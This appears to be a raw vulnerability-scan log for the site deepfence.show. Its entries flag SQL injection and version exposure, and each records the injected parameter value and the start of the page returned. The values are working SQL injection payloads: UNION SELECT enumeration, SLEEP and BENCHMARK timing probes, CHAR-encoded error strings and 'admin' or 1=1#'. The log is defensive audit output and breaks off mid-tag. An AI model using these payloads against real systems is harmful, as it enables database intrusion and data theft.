href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1624\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND ('pKlZ'='\npKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1625\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1626Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1627\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1628\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1)) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1629\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1\n#ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1630\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1631\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1632\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ''\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1633\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1634Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1635\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1636\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1637\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 